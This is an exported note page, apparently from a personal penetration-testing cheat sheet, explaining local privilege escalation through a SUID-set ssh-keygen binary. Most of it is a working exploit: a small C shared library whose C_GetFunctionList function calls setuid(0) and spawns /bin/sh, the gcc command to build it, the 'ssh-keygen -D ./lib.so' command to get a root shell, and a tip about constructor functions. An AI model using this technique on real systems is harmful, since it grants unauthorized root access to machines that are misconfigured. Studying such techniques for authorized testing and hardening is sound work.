<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>ssh-keygen</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>ssh-keygen</h1>

      <div class="ck-content">
        <p>if ssh-keygen has suid bit set, we can load a custom library and get root
          access. ssh-keygen tries to "open" the `<code>C_GetFunctionList` </code>function
          which is our injection point. The code for the shared library is as follows:</p><pre><code class="language-text-plain">int C_GetFunctionList(){
        setuid(0);
        system("/bin/sh");
}
int main() {}</code></pre>

        <p>compile the above C code into a shared library with : <code>gcc -shared -o lib.so lib.c</code> and
          run <code>ssh-keygen -D ./lib.so</code> to get root.</p>
        <p>we can also inclue <code>__attribute__((constructor))</code> with a random
          function and it'll run whenever it's loaded.</p>
      </div>
    </div>
  </body>

</html>